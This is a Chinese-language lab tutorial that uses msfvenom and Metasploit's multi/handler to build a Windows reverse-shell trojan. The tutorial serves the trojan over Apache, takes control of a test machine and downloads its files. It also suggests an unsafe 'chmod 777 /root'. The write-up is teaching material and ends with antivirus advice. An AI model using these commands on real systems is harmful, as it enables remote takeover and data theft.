实验环境
攻击机:Kali-Linux-2021.2-vmware-amd64
靶机:Win2003 旗舰版
实验过程
一、利用metasploit生成被控端
打开kali窗口,输入命令(注意空格符,复现过程惨痛代价)
sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=攻击机的ip地址 lport=5000 -f exe -o /root/payload.exe
这样就是生成成功了
远程控制程序payload.exe(被控端)生成在我攻击机上的root文件夹里(root目录下文件会隐藏,ctrl+h就能显现出来了)
ps:如果进入/root/这个文件目录提示文件权限不足时,可以使用chmod 777 /root 命令来解锁权限
将木马文件payload.exe 拷贝到/var/www/html, 开启apache服务
cp /root/payload.exe /var/www/html/
service apache2 start
打开靶机,用浏览器访问以下url地址下载木马并安装
攻击机ip/ payload.exe 
二、 启动攻击
kali窗口输入命令打开msf工具,并依次输入以下命令,配置连接
命令:msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 攻击机ip
set lport 5000
exploit
靶机运行网站下载的payload.exe文件后,回到攻击机,我们发现,Metasploit打开了一个session(会话),这表示从现在开始我们可以通过被控端程序控制目标计算机了
输入ls命令查看目标计算机当前目录下的文件
我们在靶机该目录下使用下面的命令,就可以从目标靶机的当前目录下载文件到攻击机上了
download 文件名
文件下载一般是放到攻击机存放.exe木马的目录下(ps:root目录下文件会隐藏,ctrl+h就能显现出来了)
小结
这种木马.exe能利用是因为靶机上没有安装相关安全检测软件(例如火绒安全),所以我们的物理机上还是安装一个,安装未知来源的app是先扫描一下,还有电脑要常杀毒,保护我们的安全,very good!
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
